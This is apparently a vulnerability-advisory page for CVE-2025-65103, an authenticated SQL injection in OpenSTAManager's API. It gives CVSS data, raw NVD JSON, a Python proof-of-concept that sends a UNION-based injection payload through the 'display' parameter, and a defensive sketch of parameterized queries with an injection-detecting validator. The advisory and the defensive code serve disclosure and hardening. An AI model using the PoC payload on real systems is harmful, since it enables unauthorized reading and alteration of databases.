Security Vulnerability Report
CVE-2025-65103 CVSS 8.8 HIGH

CVE-2025-65103

Published: 2025-11-19 20:15:54
Last Modified: 2026-04-15 00:35:42

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenSTAManager < 2.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-65103 OpenSTAManager SQL Injection PoC
# Target: OpenSTAManager < 2.9.5
# Vulnerability: Authenticated SQL Injection via display parameter in API

def exploit_sql_injection(target_url, session_token):
    """
    Exploit SQL injection in OpenSTAManager API
    """
    headers = {
        'Authorization': f'Bearer {session_token}',
        'Content-Type': 'application/json'
    }

    # SQL Injection payload to extract database version
    # Using UNION-based injection technique
    payload = {
        'display': "1' UNION SELECT NULL,version(),user(),database()-- -",
        'module': 'anagraphs'
    }

    target = f"{target_url.rstrip('/')}/api/v1/plugins"

    print(f"[*] Targeting: {target}")
    print(f"[*] Payload: {payload}")

    try:
        response = requests.post(target, json=payload, headers=headers, timeout=30)
        if response.status_code == 200:
            print("[+] Request successful - check response for SQL injection results")
            print(f"[+] Response: {response.text[:500]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_token>")
        print(f"Example: python {sys.argv[0]} https://target.com/token ABC123")
        sys.exit(1)
    target_url = sys.argv[1]
    session_token = sys.argv[2]
    exploit_sql_injection(target_url, session_token)
```
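As an added illustration of the defect class the description names (this is not OpenSTAManager's code, and its real query is not known here): a query builder that splices the `display` parameter into SQL, beside a hardened form that binds the value and validates it before any query runs, checked against the request shape the PoC above sends. The table name, the strict-format rule and the sample bodies are constructed.

```python
import re
from typing import Optional

# A legitimate display value is assumed to be a short word (constructed rule).
STRICT_FORMAT = re.compile(r"^\w{1,64}$")
# Metacharacters and keywords that never occur in a legitimate value.
SQLI_HINTS = re.compile(r"'|--|;|\bunion\b|\bselect\b", re.IGNORECASE)

def build_query_unsafe(display: str) -> str:
    """Vulnerable pattern the advisory describes: the request parameter is
    spliced into the statement, so a closing quote followed by UNION ...
    becomes part of the SQL the database executes."""
    return f"SELECT id FROM anagraphs WHERE id = '{display}'"

def build_query_safe(display: str) -> tuple[str, tuple[str, ...]]:
    """Hardened form: the value travels as a bound parameter, so the driver
    never interprets it as SQL. (Identifiers such as column names cannot be
    bound; those must be checked against an allowlist instead.)"""
    return ("SELECT id FROM anagraphs WHERE id = ?", (display,))

def validate_display(display: str) -> Optional[str]:
    """Return None when the value is acceptable, else a rejection reason.
    Serves as input validation and as a detection hook for request logs."""
    if STRICT_FORMAT.match(display):
        return None
    if SQLI_HINTS.search(display):
        return "sql metacharacters in display"
    return "display has unexpected characters"

def check_request(body: dict) -> tuple[bool, str]:
    """Gate a JSON body of the shape the PoC posts before any query is built."""
    display = body.get("display")
    if not isinstance(display, str):
        return False, "display missing or not a string"
    reason = validate_display(display)
    return (reason is None), (reason or "ok")

if __name__ == "__main__":
    # Constructed samples mirroring the payload shape shown on this page.
    bad = {"display": "1' UNION SELECT NULL,version(),user(),database()-- -",
           "module": "anagraphs"}
    good = {"display": "name", "module": "anagraphs"}
    print(build_query_unsafe(bad["display"]))  # injected SQL lands in the statement
    print(check_request(bad))                  # (False, 'sql metacharacters in display')
    print(check_request(good))                 # (True, 'ok')
```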

References

https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65103",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T20:15:54.107",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j",
        "source": "[email protected]"
      }
    ]
  }
}
```